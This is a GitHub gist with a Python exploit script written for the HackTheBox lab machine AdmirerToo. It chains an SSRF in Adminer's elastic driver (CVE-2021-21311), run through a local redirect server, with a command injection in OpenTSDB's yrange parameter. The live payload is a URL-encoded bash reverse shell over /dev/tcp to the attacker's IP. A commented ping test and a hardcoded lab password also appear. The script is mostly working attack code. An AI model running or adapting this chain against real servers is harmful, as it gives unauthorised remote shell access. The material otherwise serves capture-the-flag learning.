Skip to content

Instantly share code, notes, and snippets.

@bitstuffing

bitstuffing/login.py

Created May 17, 2022 11:48
Show Gist options
  • Save bitstuffing/ced0a705e5e893aa5ed78a84e72a57f9 to your computer and use it in GitHub Desktop.
Save bitstuffing/ced0a705e5e893aa5ed78a84e72a57f9 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. bitstuffing created this gist May 17, 2022.
    109 changes: 109 additions & 0 deletions login.py
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,109 @@
    #!/usr/bin/python3
    '''
    This script was done to test and check all the things for AdmirerToo hard HachTheBox machine.
    It will create an HTTP redirect server for Adminer remote machine to exploit login method,
    using elastic driver to exploit SSRF, more information at:
    https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
    Information about CVE-2021-21311 explotation at:
    https://github.com/advisories/GHSA-x5r2-hj5c-8jx6
    Data will be extracted from DIV <div class='error'> and displayed in info.log
    Good responses will be stored in response.txt (all information)
    Made by @bit with love for learning purpouses only.
    '''
    import requests
    import html
    #import threading
    #choose multiprocessing because you could .terminate() subproccess and a thread with an infinite loop httpserver not
    import multiprocessing
    import sys
    import time
    from http.server import HTTPServer, BaseHTTPRequestHandler
    import logging
    logging.basicConfig(filename='info.log', encoding='utf-8', level=logging.DEBUG)

    DOMAIN = 'db.admirer-gallery.htb'

    #your IP and PORT for checks and a remote shell
    REMOTE_IP = "10.10.14.101"
    REMOTE_PORT = "39001"

    #you will need to do a great nmap work with good 'filtered' results to check this port, if you check all ports you will be banned
    port = 4242

    #first, need to check this endpoint to extract OpenTSDB version
    #uri = "api/version"
    #second, if you want to check you're able to receive a ping from remote server and execution injection
    #uri = "q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%27ping+-c+1+"+REMOTE_IP+"%27)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
    #third, payload to remote console
    uri = 'q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%27%2Fbin%2Fbash+-c+%22%2Fbin%2Fbash+-i+%3E%26+%2Fdev%2Ftcp%2F'+REMOTE_IP+'%2F'+REMOTE_PORT+'+0%3E%261%22%27)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json'
    print("testing port %s" % port)
    print("testing uri %s" % uri)


    '''
    This class will open a local HTTP to redirect
    '''
    class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
    self.send_response(302)
    self.send_header('Location', "http://127.0.0.1:%s/%s" % (port,uri))
    self.end_headers()

    '''
    Function to wrap local redirect server in a thread
    '''
    def thread_function(port):
    HTTPServer(("", port), Redirect).serve_forever()

    #x = threading.Thread(target=thread_function, args=(80,))
    x = multiprocessing.Process(target=thread_function, args=(80,))
    x.start()
    time.sleep(1) #if you close it in a looper to scan remote ports you will get a too many logins from WAF, and it's needed more than 1 second
    headersDic = {
    "User-Agent" : "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0",
    "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language" : "en-US,en;q=0.5",
    # "Accept-Encoding" : "gzip, deflate",
    "Origin" : "http://%s" % DOMAIN
    }

    s = requests.Session()
    r = s.get('http://%s' % DOMAIN, headers=headersDic)

    #could extract data from first response but... I hardcoded that

    #from login page, you could extract it from response but it's constant
    #ADMIRER_PASSWORD = "1w4nn4b3adm1r3d2"
    ADMIRER_PASSWORD = r.text
    ADMIRER_PASSWORD = ADMIRER_PASSWORD[ADMIRER_PASSWORD.find('auth[password]" value="')+len('auth[password]" value="'):]
    ADMIRER_PASSWORD = ADMIRER_PASSWORD[:ADMIRER_PASSWORD.find('"')]

    postData = {
    "auth[driver]" : "elastic", #this driver do the magic
    "auth[server]" : REMOTE_IP,
    "auth[username]" : "admirer_ro",
    "auth[password]" : ADMIRER_PASSWORD,
    "auth[permanent]" : "1"
    }

    r2 = s.post('http://%s/' % DOMAIN,data=postData, headers=headersDic)

    response = r2.text
    response_original = response #store it for log purpousess
    response = response[response.find("<div class='error'>")+len("<div class='error'>"):response.find("<form action='' method='post'>")].strip()
    response = response[:len(response)-len('</div>')]

    response = html.unescape(response)
    if len(response) == 86: #play with right response size, so... it's discarted
    logging.debug('DISCARTED! port % - response: %s' % (port,response))
    else:
    logging.info('GOOD port %s detected' % port)

    with open('response.txt', 'w') as f:
    f.write(response_original)

    x.terminate()